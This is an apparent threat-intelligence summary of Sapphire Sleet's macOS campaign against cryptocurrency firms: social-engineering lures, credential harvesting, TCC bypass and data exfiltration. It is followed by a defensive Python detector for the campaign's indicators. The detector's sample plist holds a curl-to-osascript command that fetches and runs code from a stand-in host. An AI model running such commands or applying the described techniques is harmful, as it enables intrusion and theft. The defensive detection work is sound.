(microsoft.com) Sapphire Sleet macOS Campaign: Social Engineering, Credential Harvesting, and Multi-Stage Payload Delivery Targeting Cryptocurrency Sectors
North Korean APT Sapphire Sleet (aka BlueNoroff) is actively targeting macOS users in the cryptocurrency, finance, and blockchain sectors through a multi-stage social engineering campaign. No CVEs are exploited; the whole chain relies on deception.
In brief - Sapphire Sleet lures targets with fake recruiter profiles and Zoom SDK update lures, harvesting credentials via fake macOS dialogs, bypassing TCC/Gatekeeper, and exfiltrating wallets, browser creds, Telegram sessions, and keychain data. Apple has deployed mitigations following coordinated disclosure.
Technically - The attack begins with a compiled AppleScript lure (Zoom SDK Update.scpt) that hides its malicious logic beneath a long run of blank lines. Execution triggers a curl-to-osascript chain (using the User-Agent strings mac-cur1 through mac-cur5) that deploys com.apple.cli, a services backdoor, and icloudz (a reflective loader built on NSCreateObjectFileImageFromMemory). Persistence is achieved via a LaunchDaemon labelled com.google.chromes.updaters. Credential harvesting uses systemupdate.app (validating the captured password with dscl -authonly) and exfiltrates over the Telegram Bot API. The TCC bypass uses Finder-assisted manipulation of TCC.db to grant osascript AppleEvents permissions. A 575-line AppleScript then exfiltrates seven data categories (wallets, SSH keys, Notes, and others) over port 8443.
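The indicators in the summary above (the LaunchDaemon label, the curl-to-osascript delivery, the mac-cur1..5 User-Agent family, and the blank-line padding in the lure script) lend themselves to simple host and proxy hunts. The following is an added detection example written for this page; it is not code from the Microsoft report. All sample inputs (the two plists, the proxy log lines, the script text) are constructed here for illustration, and the `example.invalid` host and the 50-line blank-run threshold are assumptions, not values from the report.

```python
"""Added detection example (not from the Microsoft report): checks LaunchDaemon
plists, proxy log lines and AppleScript source for the Sapphire Sleet
indicators named in the summary. All sample data below is constructed."""
import plistlib
import re
from typing import List, Optional

# Persistence label named in the report.
SUSPICIOUS_LABELS = {"com.google.chromes.updaters"}
# curl User-Agent strings mac-cur1 .. mac-cur5 named in the report.
UA_PATTERN = re.compile(r"\bmac-cur[1-5]\b")


def check_launchdaemon(plist_bytes: bytes) -> List[str]:
    """Return the reasons a LaunchDaemon plist looks suspicious (empty if clean)."""
    data = plistlib.loads(plist_bytes)
    reasons = []
    label = data.get("Label", "")
    if label in SUSPICIOUS_LABELS:
        reasons.append(f"known Sapphire Sleet persistence label: {label}")
    args = " ".join(data.get("ProgramArguments", []))
    # A daemon whose command line feeds curl output into osascript matches the
    # curl-to-osascript delivery chain described in the report.
    if "curl" in args and "osascript" in args:
        reasons.append("ProgramArguments chain curl into osascript")
    return reasons


def flag_user_agents(log_lines: List[str]) -> List[str]:
    """Return proxy log lines whose User-Agent is in the mac-cur1..5 family."""
    return [line for line in log_lines if UA_PATTERN.search(line)]


def hidden_code_offset(script_text: str, min_blank_run: int = 50) -> Optional[int]:
    """Return the 1-based line number of the first code line that follows a run
    of at least min_blank_run blank lines (the padding trick used by the lure),
    or None when no such run exists. The threshold is an assumption."""
    blank_run = 0
    for idx, line in enumerate(script_text.splitlines()):
        if line.strip() == "":
            blank_run += 1
            continue
        if blank_run >= min_blank_run:
            return idx + 1
        blank_run = 0
    return None


# --- constructed sample inputs -------------------------------------------
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.google.chromes.updaters",
    "ProgramArguments": ["/bin/sh", "-c",
                         "curl -s -A mac-cur3 http://example.invalid/u | osascript"],
    "RunAtLoad": True,
})
CLEAN_PLIST = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
    "RunAtLoad": True,
})
SAMPLE_PROXY_LOG = [
    '2024-05-01T10:00:01Z 10.0.0.5 GET http://example.invalid/ "Mozilla/5.0 (Macintosh)"',
    '2024-05-01T10:00:02Z 10.0.0.5 GET http://example.invalid/stage "mac-cur1"',
    '2024-05-01T10:00:03Z 10.0.0.7 GET http://example.invalid/ "curl/8.4.0"',
    '2024-05-01T10:00:04Z 10.0.0.5 GET http://example.invalid/stage2 "mac-cur5"',
]
# One visible line, 200 blank lines, then the real payload line (line 202).
SAMPLE_SCRIPT = ('display dialog "Zoom SDK update available"\n'
                 + "\n" * 200
                 + 'do shell script "echo placeholder"\n')

if __name__ == "__main__":
    print("daemon:", check_launchdaemon(SAMPLE_PLIST))
    print("clean daemon:", check_launchdaemon(CLEAN_PLIST))
    print("UA hits:", flag_user_agents(SAMPLE_PROXY_LOG))
    print("hidden code at line:", hidden_code_offset(SAMPLE_SCRIPT))
```

On a real host the plist checker would be run over each file in /Library/LaunchDaemons and /Library/LaunchAgents, and the blank-run check over decompiled .scpt sources; the User-Agent hunt is meant for egress proxy or EDR network telemetry, where a curl client identifying itself as `mac-curN` is distinctive enough to alert on directly.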